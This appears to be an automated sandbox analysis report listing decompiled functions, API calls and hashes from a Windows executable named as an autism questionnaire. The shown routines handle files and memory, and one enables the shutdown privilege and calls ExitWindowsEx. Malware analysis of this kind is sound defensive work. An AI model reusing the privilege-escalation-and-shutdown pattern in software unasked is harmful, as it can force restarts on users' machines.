                                                                                              • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                                              • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00422A18, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 31%
                                                                                              			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x422a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004229AC(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E004084EC(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00422A65);
				return E00407A20( &_v8);
			}






                                                                                              0x00422a1b
                                                                                              0x00422a22
                                                                                              0x00422a23
                                                                                              0x00422a28
                                                                                              0x00422a2b
                                                                                              0x00422a33
                                                                                              0x00422a41
                                                                                              0x00422a4a
                                                                                              0x00422a4d
                                                                                              0x00422a50
                                                                                              0x00422a5d

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                                              • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                                                              • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                                              • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00423DA8, Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}




                                                                                              0x00423de5
                                                                                              0x00423ded

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                                              • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                                                              • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                                              • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409FA8, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00409FA8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}












                                                                                              0x00409fb0
                                                                                              0x00409fb2
                                                                                              0x00409fb6
                                                                                              0x00409fc6
                                                                                              0x00409fcf
                                                                                              0x00409fd4
                                                                                              0x00409fd6
                                                                                              0x00409fdb
                                                                                              0x00409fe0
                                                                                              0x00409fe0
                                                                                              0x00409fdb
                                                                                              0x00409fee

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                                                                • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                                                • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 4113206344-0
                                                                                              • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                                              • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                                                              • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                                              • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00423ED8, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00423ED8(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00423CAC( *_t7);
				}
				return _t4;
			}





                                                                                              0x00423ed9
                                                                                              0x00423edf
                                                                                              0x00423ee6
                                                                                              0x00000000
                                                                                              0x00423eea
                                                                                              0x00423ef0

                                                                                              APIs
                                                                                              • SetEndOfFile.KERNEL32(?,7FB50010,004B6358,00000000), ref: 00423EDF
                                                                                                • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 734332943-0
                                                                                              • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                                              • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                                                              • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                                              • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040CAA4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040CAA4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}





                                                                                              0x0040caa8
                                                                                              0x0040cab4

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem
                                                                                              • String ID:
                                                                                              • API String ID: 31276548-0
                                                                                              • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                                              • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                                                              • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                                              • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403BCC, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00403BCC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E00403B60(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x4bbaf0 = 0;
					return 0;
				} else {
					_t10 =  *0x4bbadc; // 0x4bbad8
					_t14 = _t4;
					 *_t14 = 0x4bbad8;
					 *0x4bbadc = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x4bbaf0 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x4bbaec = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                                                              0x00403bce
                                                                                              0x00403bd0
                                                                                              0x00403be3
                                                                                              0x00403bea
                                                                                              0x00403c3c
                                                                                              0x00403c45
                                                                                              0x00403bec
                                                                                              0x00403bec
                                                                                              0x00403bf2
                                                                                              0x00403bf4
                                                                                              0x00403bfa
                                                                                              0x00403bff
                                                                                              0x00403c02
                                                                                              0x00403c06
                                                                                              0x00403c11
                                                                                              0x00403c1e
                                                                                              0x00403c26
                                                                                              0x00403c28
                                                                                              0x00403c35
                                                                                              0x00403c39
                                                                                              0x00403c39

                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                                              • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                                                              • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                                              • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403CF6, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E00403CF6(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E00403C48();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4bdb78 = 0;
				return _t30;
			}
















                                                                                              0x00403cfa
                                                                                              0x00403cfc
                                                                                              0x00403d01
                                                                                              0x00403d04
                                                                                              0x00403d09
                                                                                              0x00403d0d
                                                                                              0x00403d13
                                                                                              0x00403d17
                                                                                              0x00403d1d
                                                                                              0x00403d39
                                                                                              0x00403d3d
                                                                                              0x00403d40
                                                                                              0x00403d42
                                                                                              0x00403d4a
                                                                                              0x00403d5e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403d65
                                                                                              0x00403d6b
                                                                                              0x00403d6d
                                                                                              0x00403d6f
                                                                                              0x00000000
                                                                                              0x00403d6f
                                                                                              0x00000000
                                                                                              0x00403d6b
                                                                                              0x00403d60
                                                                                              0x00403d1f
                                                                                              0x00403d27
                                                                                              0x00403d2e
                                                                                              0x00403d34
                                                                                              0x00403d30
                                                                                              0x00403d30
                                                                                              0x00403d30
                                                                                              0x00403d2e
                                                                                              0x00403d73
                                                                                              0x00403d75
                                                                                              0x00403d7e
                                                                                              0x00403d87
                                                                                              0x00403d87
                                                                                              0x00403d8a
                                                                                              0x00403d9a

                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Free$Query
                                                                                              • String ID:
                                                                                              • API String ID: 778034434-0
                                                                                              • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                                              • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                                                              • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                                              • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 0040A928, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E0040A928(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040A904(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040A904(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040A34C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040A904(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040A34C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040A34C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040A34C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                                                              0x0040a934
                                                                                              0x0040a937
                                                                                              0x0040a93d
                                                                                              0x0040a94a
                                                                                              0x0040a94e
                                                                                              0x0040a98d
                                                                                              0x0040a994
                                                                                              0x0040a9d4
                                                                                              0x00000000
                                                                                              0x0040a996
                                                                                              0x0040a99e
                                                                                              0x0040a9af
                                                                                              0x0040a9b5
                                                                                              0x0040a9bb
                                                                                              0x0040a9c3
                                                                                              0x0040a9c9
                                                                                              0x0040a9d7
                                                                                              0x0040a9d9
                                                                                              0x0040a9dc
                                                                                              0x0040a9de
                                                                                              0x0040a9e0
                                                                                              0x0040a9e0
                                                                                              0x0040a9e3
                                                                                              0x0040a9eb
                                                                                              0x0040a9fc
                                                                                              0x0040aac3
                                                                                              0x0040aa0e
                                                                                              0x0040aa12
                                                                                              0x0040aa14
                                                                                              0x0040aa16
                                                                                              0x0040aa18
                                                                                              0x0040aa18
                                                                                              0x0040aa23
                                                                                              0x0040aa33
                                                                                              0x0040aa37
                                                                                              0x0040aa39
                                                                                              0x0040aa3b
                                                                                              0x0040aa3d
                                                                                              0x0040aa3d
                                                                                              0x0040aa43
                                                                                              0x0040aa5b
                                                                                              0x0040aa62
                                                                                              0x0040aa68
                                                                                              0x0040aa84
                                                                                              0x0040aa86
                                                                                              0x0040aaad
                                                                                              0x0040aabf
                                                                                              0x0040aac1
                                                                                              0x00000000
                                                                                              0x0040aac1
                                                                                              0x0040aa84
                                                                                              0x0040aa62
                                                                                              0x00000000
                                                                                              0x0040aa23
                                                                                              0x0040aad9
                                                                                              0x0040aad9
                                                                                              0x0040a9eb
                                                                                              0x0040a9c9
                                                                                              0x0040a9b5
                                                                                              0x0040a99e
                                                                                              0x0040a950
                                                                                              0x0040a95b
                                                                                              0x0040a95f
                                                                                              0x00000000
                                                                                              0x0040a961
                                                                                              0x0040a961
                                                                                              0x0040a96c
                                                                                              0x0040a970
                                                                                              0x0040a975
                                                                                              0x00000000
                                                                                              0x0040a977
                                                                                              0x0040a983
                                                                                              0x0040a983
                                                                                              0x0040a975
                                                                                              0x0040a95f
                                                                                              0x0040aade
                                                                                              0x0040aae7

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                                                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                                                              • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                              • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                              • API String ID: 1930782624-3908791685
                                                                                              • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                                              • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                                                              • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                                              • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004AF110, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E004AF110() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E0041FF2C() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}







                                                                                              0x004af11b
                                                                                              0x004af178
                                                                                              0x004af17c
                                                                                              0x004af184
                                                                                              0x00000000
                                                                                              0x004af186
                                                                                              0x004af12d
                                                                                              0x004af13f
                                                                                              0x004af144
                                                                                              0x004af14c
                                                                                              0x004af166
                                                                                              0x004af172
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004af174
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
